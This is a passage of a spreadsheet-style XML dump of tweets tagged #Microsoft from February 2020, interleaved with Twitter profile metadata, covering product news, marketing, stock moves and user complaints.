    <t>{'id': 78440329, 'id_str': '78440329', 'name': 'helixstorm', 'screen_name': 'helixstorm', 'location': 'Temecula, CA', 'description': 'Managed IT and IT Support for the Temecula, Murrieta, and surrounding areas in CA. Virtualization and cloud computing experts. VMware and HP resellers.', 'url': 'http://t.co/kq3rqk3B3Y', 'entities': {'url': {'urls': [{'url': 'http://t.co/kq3rqk3B3Y', 'expanded_url': 'http://helixstorm.com', 'display_url': 'helixstorm.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 233, 'friends_count': 435, 'listed_count': 15, 'created_at': 'Tue Sep 29 22:53:53 +0000 2009', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1930,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'http://pbs.twimg.com/profile_images/586602374959079424/--y_P9ZN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/586602374959079424/--y_P9ZN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/78440329/1430433163', 'profile_link_color': '0374BB',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</si>
  <si>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23:29:08 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Microsoft Edge Now Lets You Block Potentially Unwanted Programs:" https://t.co/V7r5l9t7ex
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Feb 27 23:23:14 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is making other plans for the upcoming Game Developers Conference in March.
#GDC 
#gamedevelopment #gaming #Xbox #XboxSeriesX #XboxOne #gamers #videogames 
https://t.co/VVXBy7jx0o</t>
  </si>
  <si>
    <t>{'id': 1136475261468389378, 'id_str': '1136475261468389378', 'name': 'Punctuate_NickL', 'screen_name': 'Punctuate_NickL', 'location': '', 'description': '#Writing #Photoshop #ClevelandBrowns fanatic \n\nObsessed with writing about #videogames and #entertainment. Old movies quotes are the answer always!', 'url': 'https://t.co/YeKrp84ag2', 'entities': {'url': {'urls': [{'url': 'https://t.co/YeKrp84ag2', 'expanded_url': 'http://www.punctuatemedia.com', 'display_url': 'punctuatemedia.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 97, 'friends_count': 519, 'listed_count': 4, 'created_at': 'Thu Jun 06 03:29:51 +0000 2019', 'favourites_count': 147, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 897, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1141481879973040128/LUJuUidg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141481879973040128/LUJuUidg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1136475261468389378/1578731948',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</si>
  <si>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23:20:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Flight Simulator Update  February 27th, 2020 https://t.co/YDfKvtxbfT #Microsoft #MSFS #Update</t>
  </si>
  <si>
    <t>{'id': 738770341187735552, 'id_str': '738770341187735552', 'name': 'FSElite', 'screen_name': 'FSElite', 'location': '', 'description': 'Providing all the daily content #you desire for flight simulation whilst paving the way for the next-gen simmer.', 'url': 'https://t.co/2CDFJHXOnX', 'entities': {'url': {'urls': [{'url': 'https://t.co/2CDFJHXOnX', 'expanded_url': 'http://fselite.net', 'display_url': 'fselite.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3939, 'friends_count': 94, 'listed_count': 39, 'created_at': 'Fri Jun 03 16:32:29 +0000 2016', 'favourites_count': 453, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5393,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'http://pbs.twimg.com/profile_images/1109198352984539136/TkfG-CjP_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1109198352984539136/TkfG-CjP_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/738770341187735552/1569697705',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</si>
  <si>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23:17:35 +0000 2020</t>
  </si>
  <si>
    <t>Goodbye: #MCSE, #MCSD, and #MCSA Certifications are Retiring
#Microsoft #Certification #MicrosoftCertified #Azure #RoleBased https://t.co/d5sYUVpdXc https://t.co/OxYaYqDHEE</t>
  </si>
  <si>
    <t>Thu Feb 27 23:17:33 +0000 2020</t>
  </si>
  <si>
    <t>Goodbye: #MCSE, #MCSD, and #MCSA Certifications are Retiring
#Microsoft #Certification #MicrosoftCertified #Azure #RoleBased https://t.co/idX4smwLKe https://t.co/dcm5021pkH</t>
  </si>
  <si>
    <t>Thu Feb 27 23:15:40 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft customer stories: SES creates an open, standards-based network automation and service orchestration platform using Azure-based NFV solution from Amdocs https://t.co/jGi0lz9LLY</t>
  </si>
  <si>
    <t>{'id': 58944795, 'id_str': '58944795', 'name': 'Luiz Ricci', 'screen_name': 'LuizRicci', 'location': 'Luxembourg', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 37, 'friends_count': 137, 'listed_count': 1, 'created_at': 'Tue Jul 21 22:30:52 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 501,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'http://pbs.twimg.com/profile_images/1215016851048214529/bKBlwF65_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215016851048214529/bKBlwF65_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/58944795/1578517567',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</si>
  <si>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23:15:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is patching a major #Windows10 flaw discovered by the NSA
https://t.co/VoSRoc029O</t>
  </si>
  <si>
    <t>{'id': 28703779, 'id_str': '28703779', 'name': 'Robert Caruso', 'screen_name': 'fondalo', 'location': 'Florida, USA', 'description': 'I help B2B, B2C, SaaS, Tech, Startup and Medium local brands get results w/ integrated digital marketing, content &amp; social', 'url': 'https://t.co/gveHTtCL3l', 'entities': {'url': {'urls': [{'url': 'https://t.co/gveHTtCL3l', 'expanded_url': 'http://fondalo.com', 'display_url': 'fondalo.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 97869, 'friends_count': 55130, 'listed_count': 6194, 'created_at': 'Sat Apr 04 01:04:10 +0000 2009', 'favourites_count': 22121, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 337326,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'http://pbs.twimg.com/profile_images/378800000410206356/9b31ccb31eb87db77cf0f8d8bf0a2149_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000410206356/9b31ccb31eb87db77cf0f8d8bf0a2149_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/28703779/1562415301',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</si>
  <si>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Feb 27 23:13:45 +0000 2020</t>
  </si>
  <si>
    <t>At Microsoft our employees are our greatest asset. Here's how were investing in #technology and #culture to #transform their experience. #Microsoft #Microsoft365 https://t.co/d3fThgNecl</t>
  </si>
  <si>
    <t>Thu Feb 27 23:12:10 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has the worst customer service I've come across. It's too bad I have to use Windows, or I would choose to never use your products again. Thanks for locking me out of my account with no way to reclaim it!</t>
  </si>
  <si>
    <t>{'id': 1489055340, 'id_str': '1489055340', 'name': 'Alan Christesen', 'screen_name': 'AlanChristesen', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 37, 'listed_count': 0, 'created_at': 'Fri Jun 07 00:15:16 +0000 2013', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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</si>
  <si>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Feb 27 23:12:04 +0000 2020</t>
  </si>
  <si>
    <t>Thursday's biggest slides:
-#FLIR Systems down 18% $FLIR
-#Chipotle down 10% $CMG
-#Apple down 7% $AAPL
-#Microsoft down 7% $MSFT
-#Amazon down 5% $AMZN
-#Google down 6% $GOOGL
-#Tesla down 13% $TSLA</t>
  </si>
  <si>
    <t>{'id': 1217244472062496768, 'id_str': '1217244472062496768', 'name': 'MarketBites', 'screen_name': 'Market_Bites', 'location': 'Chicago, IL', 'description': 'The most important financial news\u200b delivered directly to you.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 15, 'friends_count': 28, 'listed_count': 0, 'created_at': 'Wed Jan 15 00:38:35 +0000 2020', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 150, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1228768734963290112/PH3WXMzY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228768734963290112/PH3WXMzY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1217244472062496768/1581796271',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</si>
  <si>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23:11:03 +0000 2020</t>
  </si>
  <si>
    <t>The Start Menu on a new #Windows10 has #Microsoft #Office icons which are badly labelled, misleading and setup to promote Microsofts corporate agenda.
Well explain what Microsoft has done and how regular #Office365 users can make the Start Menu bette https://t.co/e9uCB2Q1UD</t>
  </si>
  <si>
    <t>Thu Feb 27 23:09:38 +0000 2020</t>
  </si>
  <si>
    <t>My colleague @ShellyKramer provides provoking, timely insights on the Huawei-Google relationship as Google seeks to rekindle business relations with Huawei: https://t.co/wdy4QqBGJe #Huawei #Google #Microsoft #5G #applicationperformance</t>
  </si>
  <si>
    <t>{'id': 1127870611500486657, 'id_str': '1127870611500486657', 'name': 'Ron Westfall', 'screen_name': 'sirronsilicon1', 'location': 'Katy, Texas', 'description': 'Senior Analyst + Research Director @FuturumResearch. Keen on #silicon, #software, #cloud, #enterprise, #IoT, #5G and #infrastructure matters.', 'url': 'https://t.co/fKlgGofgTb', 'entities': {'url': {'urls': [{'url': 'https://t.co/fKlgGofgTb', 'expanded_url': 'http://www.futurumresearch.com', 'display_url': 'futurumresearch.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 67, 'friends_count': 165, 'listed_count': 3, 'created_at': 'Mon May 13 09:38:03 +0000 2019', 'favourites_count': 1145, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1060,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'http://pbs.twimg.com/profile_images/1133377364006789120/6iTsRKG8_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1133377364006789120/6iTsRKG8_normal.png',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</si>
  <si>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23:08:13 +0000 2020</t>
  </si>
  <si>
    <t>The Dow Jones drops nearly 1200 points as coronavirus fears batter stock markets https://t.co/F9El2a18DT #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 23:07:28 +0000 2020</t>
  </si>
  <si>
    <t>My personally Wrap Up theses for using Cortex in the future
#Cortex #Microsoft 365 #AI Builder #KI #New oWay of Knowlegdemanagement https://t.co/By4aVw30WW</t>
  </si>
  <si>
    <t>{'id': 1111401754531454976, 'id_str': '1111401754531454976', 'name': 'AnsgarJahns', 'screen_name': 'AnsgarJahns', 'location': 'Stormarn, Schleswig-Holstein', 'description': '#Kanban #Knowlegdemanagement #Collaboration #Sharepoint #Azure #DataProtectionOfficer #MS365 #WOL #NewWork #Designthinking #views are my own private', 'url': 'https://t.co/TO35BYgkbW', 'entities': {'url': {'urls': [{'url': 'https://t.co/TO35BYgkbW', 'expanded_url': 'https://hibb.hamburg.de/schulentwicklung/wibes/', 'display_url': 'hibb.hamburg.de/schulentwickluâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 233, 'friends_count': 831, 'listed_count': 6, 'created_at': 'Thu Mar 28 22:56:41 +0000 2019', 'favourites_count': 1843, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1538,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'http://pbs.twimg.com/profile_images/1111401960299589632/Fbt6i7Mr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1111401960299589632/Fbt6i7Mr_normal.jpg',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</si>
  <si>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23:02:39 +0000 2020</t>
  </si>
  <si>
    <t>I am a fan of naked meeting hot girls #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 23:02:08 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #EpicGames back out of #GDC due to #coronavirus concerns https://t.co/XGGYTwutZa https://t.co/znES2KdzsC</t>
  </si>
  <si>
    <t>Thu Feb 27 23:01:30 +0000 2020</t>
  </si>
  <si>
    <t>From finance to health care, Teams is the solution for your business. check out a "Day in the Life" with Microsoft Teams! 
#ModernWorkplace #dayinthelife #Microsoft #Microsoft365 #M365 #MicrosoftTeams #Teams #collaboration https://t.co/ecUQ8Pe3bL</t>
  </si>
  <si>
    <t>Thu Feb 27 23:01:17 +0000 2020</t>
  </si>
  <si>
    <t>Technology can save more lives, alleviate suffering and restore human dignity by changing the way frontline relief organizations anticipate, predict and better target response efforts. Subscribe to learn more about what #Microsoft can do for you! https://t.co/hiYbXZuPCN</t>
  </si>
  <si>
    <t>{'id': 1150738833279016960, 'id_str': '1150738833279016960', 'name': 'TASE Labs', 'screen_name': 'TaseLabs', 'location': 'Pennsylvania, USA', 'description': 'TASE Labs (Technical Architecture Solution Engineering) is a technology firm with a unique Technology / Project first mentality.', 'url': 'https://t.co/pVDcN3w7x7', 'entities': {'url': {'urls': [{'url': 'https://t.co/pVDcN3w7x7', 'expanded_url': 'http://www.taselabs.net', 'display_url': 'taselabs.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 78, 'listed_count': 0, 'created_at': 'Mon Jul 15 12:08:12 +0000 2019', 'favourites_count': 123, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1150738946537742336/uqFGG_KK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1150738946537742336/uqFGG_KK_normal.jpg',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</si>
  <si>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Technology can save more lives, alleviate suffering and restore human dignity by changing the way frontline relief organizations anticipate, predict and better target response efforts. Subscribe to learn more about what #Microsoft can do for you! https://t.co/y7w6B6vbDN</t>
  </si>
  <si>
    <t>{'id': 15182095, 'id_str': '15182095', 'name': 'Michael Askins', 'screen_name': 'primed3', 'location': 'Pittsburgh, PA', 'description': 'IT Professional that loves to BBQ, Woodwork, Photography and fishing.', 'url': 'http://t.co/MPVQIQISSb', 'entities': {'url': {'urls': [{'url': 'http://t.co/MPVQIQISSb', 'expanded_url': 'http://primedci.net', 'display_url': 'primedci.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 83, 'friends_count': 293, 'listed_count': 1, 'created_at': 'Fri Jun 20 17:25:50 +0000 2008', 'favourites_count': 572, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 634,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'http://pbs.twimg.com/profile_images/925035820796514304/-mQbbJQO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/925035820796514304/-mQbbJQO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15182095/1398969671',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</si>
  <si>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Feb 27 23:00:55 +0000 2020</t>
  </si>
  <si>
    <t>What can your inbox do for you? With the interconnected power of #Microsoft #Dynamics365, the information you need is only a click away--Saving you time and creating a better experience for your customers. https://t.co/JFTG63LznX</t>
  </si>
  <si>
    <t>{'id': 138248767, 'id_str': '138248767', 'name': 'True|IT', 'screen_name': 'True_InfoTech', 'location': 'North America', 'description': 'We Care, We Connect, We Make a Difference...Together!', 'url': 'https://t.co/9gkjEEqrpH', 'entities': {'url': {'urls': [{'url': 'https://t.co/9gkjEEqrpH', 'expanded_url': 'http://trueit.com', 'display_url': 'trueit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 355, 'friends_count': 562, 'listed_count': 33, 'created_at': 'Thu Apr 29 01:24:53 +0000 2010', 'favourites_count': 303, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 826, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EEF5ED', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1092569499386052610/TvrTWCOj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1092569499386052610/TvrTWCOj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/138248767/1579555778', 'profile_link_color': '3EC2D1', 'profile_sidebar_border_color': '12610B', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 23:00:43 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #microsoft #RPA     VIA @mspowerautomate    Robotic process automation now in preview in Microsoft Power Automate  https://t.co/6BgVBn2yvc</t>
  </si>
  <si>
    <t>Thu Feb 27 23:00:25 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Corp is keen to invest in data centres in Indonesia which will soon make regulatory changes to facilitate the move. #Indonesia #Microsoft https://t.co/lIJafKcBNI https://t.co/9mOgm6SLWJ</t>
  </si>
  <si>
    <t>Thu Feb 27 23:00:18 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Corp is keen to invest in data centres in Indonesia which will soon make regulatory changes to facilitate the move. #Indonesia #Microsoft https://t.co/OGucCBMuO1 https://t.co/Zwb4aR2vDu</t>
  </si>
  <si>
    <t>Thu Feb 27 23:00:16 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Corp is keen to invest in data centres in Indonesia which will soon make regulatory changes to facilitate the move. #Indonesia #Microsoft https://t.co/UgvyaFyjCz https://t.co/4JKkjt1Z3E</t>
  </si>
  <si>
    <t>Thu Feb 27 23:00:14 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Corp is keen to invest in data centres in Indonesia which will soon make regulatory changes to facilitate the move. #Indonesia #Microsoft https://t.co/de2yIXUKGN https://t.co/YCgiePUapD</t>
  </si>
  <si>
    <t>Thu Feb 27 23:00:00 +0000 2020</t>
  </si>
  <si>
    <t>#ITechskills #Academy provides #Microsoft #excel #training, #excel #intermediate #crash #course in #Mississauga, Ontario.
we offer excel #advanced #course #classes from excel #basic #training to #advance #level.
Please write your answer in comment box !!
Follow Us and ENJOY! https://t.co/aI4l4BmyFg</t>
  </si>
  <si>
    <t>Thu Feb 27 22:57:26 +0000 2020</t>
  </si>
  <si>
    <t>The Xbox Series X can quick-resume a game even after the system has completely rebooted.
#XboxSeriesX #xbox #microsoft https://t.co/unrxNiOzmT</t>
  </si>
  <si>
    <t>{'id': 1133167226079666176, 'id_str': '1133167226079666176', 'name': 'SuperMulti-Verse.ComðŸŒ', 'screen_name': 'supermultiverse', 'location': 'Los Angeles, CA', 'description': 'Official Twitter account of https://t.co/SoF6FxOwXY ! Video Games, Beautiful Women, Action Figures, Wrestling, Comics, Anime, Cartoons and Much More.', 'url': 'https://t.co/v7wYCXJ1CN', 'entities': {'url': {'urls': [{'url': 'https://t.co/v7wYCXJ1CN', 'expanded_url': 'http://SuperMulti-Verse.com', 'display_url': 'SuperMulti-Verse.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/SoF6FxOwXY', 'expanded_url': 'http://SuperMulti-Verse.Com', 'display_url': 'SuperMulti-Verse.Com', 'indices': [28, 51]}]}}, 'protected': False, 'followers_count': 947, 'friends_count': 895, 'listed_count': 1, 'created_at': 'Tue May 28 00:24:54 +0000 2019', 'favourites_count': 1887, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1443,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'http://pbs.twimg.com/profile_images/1187940733564674048/zdFJ5e-n_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1187940733564674048/zdFJ5e-n_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1133167226079666176/1569275893',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</si>
  <si>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22:50:51 +0000 2020</t>
  </si>
  <si>
    <t>10th Magnitude Services Available Now On Microsofts Azure Marketplace 
#Microsoft #AzureMarketplace #10thMagnitude #Azure #MSPartner
https://t.co/Q795LjbwVo</t>
  </si>
  <si>
    <t>Thu Feb 27 22:45:05 +0000 2020</t>
  </si>
  <si>
    <t>Supporting growth and lower cost of ownership are just some of the reasons FLOCK Specialty Finance chose to upgrade from #QuickBooks to #Microsoft Dynamics 365 Business Central https://t.co/Nl3WVIrNmu https://t.co/9xWBBuvbEM</t>
  </si>
  <si>
    <t>{'id': 39803234, 'id_str': '39803234', 'name': 'Velosio', 'screen_name': 'velosio', 'location': 'Ohio, New Jersey, Atlanta', 'description': 'Business consultants providing BI, ERP, CRM, and PSA Solutions', 'url': 'https://t.co/Rvy4ZRiYmu', 'entities': {'url': {'urls': [{'url': 'https://t.co/Rvy4ZRiYmu', 'expanded_url': 'http://ow.ly/z5Ib30qn6a6', 'display_url': 'ow.ly/z5Ib30qn6a6', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3192, 'friends_count': 2744, 'listed_count': 170, 'created_at': 'Wed May 13 17:52:18 +0000 2009', 'favourites_count': 689, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7870,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'http://pbs.twimg.com/profile_images/1067425333908000768/JZIc7eL-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1067425333908000768/JZIc7eL-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39803234/1515364698', 'profile_link_color': '003366',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</si>
  <si>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22:43:17 +0000 2020</t>
  </si>
  <si>
    <t>#patriots #StockMarket SO Bill Gates, who is a biggie in the virus stuff, is part of why!!!  He is complaining because he can't get new laptops and computers from #china, so #microsoft has tanked stock market.  #Intentions 2 HURT AMERICA. He is upset, abt vacines, he can't sell.</t>
  </si>
  <si>
    <t>{'id': 25312088, 'id_str': '25312088', 'name': 'ðŸ‡ºðŸ‡¸ Proud Navy VeteranðŸ‡ºðŸ‡¸twatter NOT a botðŸŒŸ', 'screen_name': 'dgallup', 'location': '', 'description': '100% disabled vet-Humanitarian Service Medal - Unit Commendation at SPACE COMMAND-Son is USMC Darkhorse Vet. 2010-2011 God Bless America! #MAGAâœ¨', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 14341, 'friends_count': 15639, 'listed_count': 13, 'created_at': 'Thu Mar 19 15:04:34 +0000 2009', 'favourites_count': 34388, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 46671,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'http://pbs.twimg.com/profile_images/762782112080625664/nPDBMLv9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/762782112080625664/nPDBMLv9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/25312088/1470696467',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</si>
  <si>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22:41:55 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft Microsoft
Half the worlds population lives within . Thats why were going deep with this experimental datacenter
Thank you very much
#Microsoft #ocean #</t>
  </si>
  <si>
    <t>Thu Feb 27 22:36:43 +0000 2020</t>
  </si>
  <si>
    <t>Thanks to our Network Reception Sponsor Davis Wright Tremaine LLP! Data is the next big commodity, social engineers must be ready to use it! #microsoft #daviswrighttremainellp #howard #husl #techsummit #techlaw #sponsorship #socialengineering https://t.co/fHvA1GJ8ie</t>
  </si>
  <si>
    <t>{'id': 1216439986419126272, 'id_str': '1216439986419126272', 'name': 'M.R.Sills', 'screen_name': 'sills_mr', 'location': '', 'description': 'Trying to get through my 2L year at Howard Law while pursuing IP with twist of Social Justice!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 67, 'listed_count': 0, 'created_at': 'Sun Jan 12 19:21:16 +0000 2020', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 37, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1216440108871823361/fugLxyGD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1216440108871823361/fugLxyGD_normal.jpg',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</si>
  <si>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22:36:00 +0000 2020</t>
  </si>
  <si>
    <t>40,000 attacks under a week or so. @meraki #Cisco #MerakiNetworking #Meraki #infosec #it #informationtechnology #informationsecurity #homenetworking #homeoffice #windowsserver #windowsserver2019datacenter #microsoft #ids #ips #regionblocking @Cisco @CiscoSecurity @Azure @MSCloud https://t.co/xFnAL7iys5</t>
  </si>
  <si>
    <t>{'id': 189038144, 'id_str': '189038144', 'name': 'thedarkdade', 'screen_name': 'thedarkdad3', 'location': 'Chicago, IL', 'description': 'Currently Protecting Networks @ Fortune 100 | INFOSEC  | IN:thedarkdade Twitch:thedarkdade | YT:thedarkdade DJ,Cinematographer,Photographer,Gamer', 'url': 'https://t.co/oCF5gTR3vX', 'entities': {'url': {'urls': [{'url': 'https://t.co/oCF5gTR3vX', 'expanded_url': 'http://www.thedarkdade.com', 'display_url': 'thedarkdade.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 145, 'friends_count': 1215, 'listed_count': 40, 'created_at': 'Fri Sep 10 06:11:13 +0000 2010', 'favourites_count': 12845, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12173,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'http://pbs.twimg.com/profile_images/1180287267312689154/GYSGDFAw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1180287267312689154/GYSGDFAw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/189038144/1474826344', 'profile_link_color': 'ABB8C2',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</si>
  <si>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22:35:11 +0000 2020</t>
  </si>
  <si>
    <t>Azure DevOps Lab- Terraform using GitHub Actions https://t.co/DTd8iMGPwX #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 22:33:19 +0000 2020</t>
  </si>
  <si>
    <t>Is there any chance that Microsoft rescue the project gotham saga? Maybe a MSR Remake? @XboxP3 #xbox #microsoft #sega</t>
  </si>
  <si>
    <t>{'id': 156666892, 'id_str': '156666892', 'name': 'Marcos Gimenez', 'screen_name': 'white_nestle', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 26, 'friends_count': 92, 'listed_count': 0, 'created_at': 'Thu Jun 17 15:20:37 +0000 2010', 'favourites_count': 380, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 787,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</si>
  <si>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Feb 27 22:32:30 +0000 2020</t>
  </si>
  <si>
    <t>Can you guess what #Microsoft #Windows - #LabEveryday  in love with technology since I was young, Do do have any #OldTechPicture ? https://t.co/axP5TvHuuL</t>
  </si>
  <si>
    <t>{'id': 2618975992, 'id_str': '2618975992', 'name': 'MikeG', 'screen_name': 'RamonMikeG', 'location': 'New End, England', 'description': 'GOD first - Family - Network Administrators,Networking, Technology, Cisco CCNA &amp; CCNA Security Certified, Working on my CCNP R&amp;S. From the DR ðŸ‡©ðŸ‡´ to the ðŸŒŽ', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 215, 'friends_count': 580, 'listed_count': 19, 'created_at': 'Wed Jun 18 02:09:10 +0000 2014', 'favourites_count': 4588, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1323,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'http://pbs.twimg.com/profile_images/1069439336008036352/_kiaoLHF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1069439336008036352/_kiaoLHF_normal.jpg',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</si>
  <si>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22:31:15 +0000 2020</t>
  </si>
  <si>
    <t>I think my computer has malware. I am constantly denied access by something called #Microsoft</t>
  </si>
  <si>
    <t>{'id': 3919999215, 'id_str': '3919999215', 'name': 'Allen Bolinger', 'screen_name': 'AJBolinger1961', 'location': 'Wisconsin, USA', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Sat Oct 10 17:00:12 +0000 2015', 'favourites_count': 392, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 664,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'http://pbs.twimg.com/profile_images/652896844398333952/mSnNDMNd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/652896844398333952/mSnNDMNd_normal.jpg',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</si>
  <si>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22:30:22 +0000 2020</t>
  </si>
  <si>
    <t>Office 365 Business? Business Premium? E3 or E5? Which #Office365 package is right for my law firm? @bschorr #microsoft  https://t.co/OEaUYBTTwC https://t.co/BKVECslyL4</t>
  </si>
  <si>
    <t>Thu Feb 27 22:30:01 +0000 2020</t>
  </si>
  <si>
    <t>@dotnet When is #dotnet 4.8 available for #azure App Services? It's a question that's been asked over and over, but #microsoft can't (or won't) provide an ETA; it's been almost a year since the release ..</t>
  </si>
  <si>
